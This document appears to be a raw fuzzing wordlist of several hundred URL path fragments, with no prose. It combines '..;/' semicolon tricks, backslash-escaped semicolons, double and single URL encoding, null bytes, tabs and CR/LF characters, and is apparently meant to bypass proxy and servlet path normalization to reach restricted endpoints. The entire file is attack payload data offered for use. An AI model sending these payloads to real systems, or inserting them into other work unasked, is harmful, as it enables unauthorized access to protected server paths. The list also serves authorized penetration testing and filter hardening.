%3b
;/
\;/
;;/
\;\;/
;.js/
\;.js/
xxx/..;/
xxx/..\;/
xxx/../..;/
xxx/../..\;/
xxx/..;/..;/
xxx/..;/..\;/
#/../
#/..;/
#/..\;/
xxx/../
xxx/../;/
xxx/../\;/
xxx/..;/;/
xxx/..\;/\;/
xxx//../
xxx//..;/
xxx//..\;/
xxx/;/../
xxx/\;/../
xxx/;/..;/
xxx/\;/..\;/
\;xxx/\;/
;xxx/;/
..;;/
..\;\;/
..//..;/
..//..\;/
../;/
../\;/
../;/../
../\;/../
..;%2f
..\;%2f
..;%2f..;%2f
..\;%2f..\;%2f
..;%2f..;%2f..;%2f
..\;%2f..\;%2f..\;%2f
..%252f/
..;/../
..\;/../
..;/
..\;/
..;/..;/
..\;/..\;/
..;//../
..\;//../
..;//..;/
..\;//..\;/
..;/;/
..\;/\;/
..;/;/..;/
..\;/\;/..\;/
.;/
.\;/
;?/
\;?/
;x/
\;x/
?;/
?\;/
//
./
;/../../
;/.././../
;/../.;/../
;/..//../
;/../;/
;/../;/../
;/..;
;/.;.
;//..
;//../../
;///..
;x;/
\;/../../
\;/.././../
\;/../.\;/../
\;/..//../
\;/../\;/
\;/../\;/../
\;/..\;
\;/.\;.
\;//..
\;//../../
\;///..
\;x\;/
../
../../
../../../
../..//../
../..;/
.././../
../.;/../
..//../
..//../../
css/..;/..;/
js/..;/..;/
images;/../
images/..;/
public/..;/
../..\;/
../.\;/../
css/..\;/..\;/
js/..\;/..\;/
images\;/../
images/..\;/
public/..\;/
.../
.././
;%09;/
;%2F../
;%2f%2e%2e
;%2f%2e%2e%2f%2e%2e%2f%2f
;%2f%2f/../
;%2f..%2f%2e%2e%2f%2f
;%2f..%2f..%2f%2f
;%2f..%2f/
;%2f..%2f/..%2f
;%2f..%2f/../
;%2f../%2f..%2f
;%2f../%2f../
;%2f..//..%2f
;%2f..//../
;%2f..///;/
;%2f..//;/
;%2f..//;/;
;%2f../;//
;%2f../;/;/
;%2f../;/;/;
;%2f..;///
;%2f..;//;/
;%2f..;/;//
;%2f/%2f../
;%2f//..%2f
;%2f//../
;%2f//..;/
;%2f/;/../
;%2f/;/..;/
;%2f;//../
;%2f;/;/..;/
;/%2e%2e
;/%2e%2e%2f%2f
;/%2e%2e%2f/
;/%2e./
;/%2f%2f../
;/%2f/..%2f
;/%2f/../
;/.%2e/
;/.%2e/%2e%2e/%2f
;/../
;/..%2f
;/..%2f%2f../
;/..%2f..%2f
;/../%2f/
;/..//%2e%2e/
;/..//%2f
;//%2f../
..%2f..%2f
..%2f..%2f..%2f
;%09/
;%09../
;%09..;/
;%2f../
..%2f
.%2f
..%00/
..%0d/
..%5c
..%ff/
.%2e/
%2e%2e%2f
%20#
%20%23
%252e%252e%252f/
%252e%252e%253b/
%252e%252f/
%252e%253b/
%252e/
%2e%2e%3b/
%2e%2f/
%2e%3b/
..%00/;
..%00;/
..%09/
..%0d/;
..%0d;/
..%ff/;
..%ff;/
..;%00/
..;%0d/
..;%ff/
%0a/
%0d/
%0d%0a/
%09%3b/
%09../
%09;/
%23%3f/
%252f%252f
%252f
%2e%2e/
%2f%20%23/
%2f%23/
%2f%2f
%2f%3b%2f
%2f%3b%2f%2f
%2f%3f/
%2f;?/
%2f?;/
%3b%09/
%3b%2f%2e%2e/
%3b%2f%2e%2e%2f%2e%2e%2f%2f
%3b%2f%2e./
%3b%2f../
%3b/%2e%2e/..%2f%2f
%3b/%2e./
%3b/%2f%2f../
%3b/../
%3b//%2f../
%3f%23/
%3f%3f/
%2e/
%20/
%09/
%00/
%2f/%2f
%2f%2f%2f
;%2f
%3b%2f
;%0A/
;%252Ftest/
\;%09\;/
\;%2F../
\;%2f%2e%2e
\;%2f%2e%2e%2f%2e%2e%2f%2f
\;%2f%2f/../
\;%2f..%2f%2e%2e%2f%2f
\;%2f..%2f..%2f%2f
\;%2f..%2f/
\;%2f..%2f/..%2f
\;%2f..%2f/../
\;%2f../%2f..%2f
\;%2f../%2f../
\;%2f..//..%2f
\;%2f..//../
\;%2f..///\;/
\;%2f..//\;/
\;%2f..//\;/\;
\;%2f../\;//
\;%2f../\;/\;/
\;%2f../\;/\;/\;
\;%2f..\;///
\;%2f..\;//\;/
\;%2f..\;/\;//
\;%2f/%2f../
\;%2f//..%2f
\;%2f//../
\;%2f//..\;/
\;%2f/\;/../
\;%2f/\;/..\;/
\;%2f\;//../
\;%2f\;/\;/..\;/
\;/%2e%2e
\;/%2e%2e%2f%2f
\;/%2e%2e%2f/
\;/%2e./
\;/%2f%2f../
\;/%2f/..%2f
\;/%2f/../
\;/.%2e/
\;/.%2e/%2e%2e/%2f
\;/../
\;/..%2f
\;/..%2f%2f../
\;/..%2f..%2f
\;/../%2f/
\;/..//%2e%2e/
\;/..//%2f
\;//%2f../
\;%09/
\;%09../
\;%09..\;/
\;%2f../
..%00/\;
..%00\;/
..%0d/\;
..%0d\;/
..%ff/\;
..%ff\;/
..\;%00/
..\;%0d/
..\;%ff/
%09\;/
%2f\;?/
%2f?\;/
\;%2f
\;%0A/
\;%252Ftest/